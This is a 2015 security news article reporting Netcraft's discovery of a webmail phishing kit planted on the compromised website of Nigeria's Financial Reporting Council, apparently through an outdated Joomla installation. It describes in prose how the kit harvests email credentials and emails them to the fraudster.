Pierluigi Paganini November 06, 2015

According to Netcraft, the website of Financial Reporting Council of Nigeria is used to serve a webmail phishing site from the legitim site of the agency.

The website of the Financial Reporting Council of Nigeria was used by cyber criminals in a phishing scam. According to the experts at Netcraft, the website of Financial Reporting Council of Nigeria is used to serve a webmail phishing site from the legitim site of the agency.

The attack is not complex, crooks used a common phishing kit that allows easily to create customised phishing pages.

“The phishing content is based on a ready-to-go phishing kit that is distributed as a zip file. It contains easily-customisable PHP scripts and images designed to trick victims into surrendering either their Yahoo, Gmail, Hotmail or AOL passwords.” states the report.

The hackers likely have compromised the government website and they have deployed the phishing web page into an images directory on the Financial Reporting Council of Nigeria website. The experts noticed also that the website of the Financial Reporting Council of Nigeria runs an older version 2.5.28 of the Joomla CMS which is no more supported.

The phishing page asks for user email credentials and the phone number used as backup login credentials for the Gmail service. When the victim has inserted the information they are transmitted via email directly to the cyber criminals. Then the phishing page redirects the victim’s browser to the Saatchi Art investment website at http://explore.saatchiart.com/invest-in-art/, but experts clarified that it is not involved in the scam.

“After a victim enters his or her email credentials into the phishing site, both the username and password are transmitted via email directly to the fraudster. These emails also contain the victim’s IP address, and a third-party web service is used to deduce which country the victim is in.” continues the post published by Netcraft.

The experts at Netcraft explained that this phishing scam is unusual because attackers seem to be more interested in collect users’ credentials shared among several web services, instead the victims’ banking account logins.

Netcraft reported that the majority of Nigeria’s government websites, including the one operated by the Financial Reporting Council, are hosted in the United States. They speculate the attacker exploited a flaw in the Joomla! CMS to deploy the phishing kit.

Pierluigi Paganini

(Security Affairs –Financial Reporting Council of Nigeria, phishing, DDoS)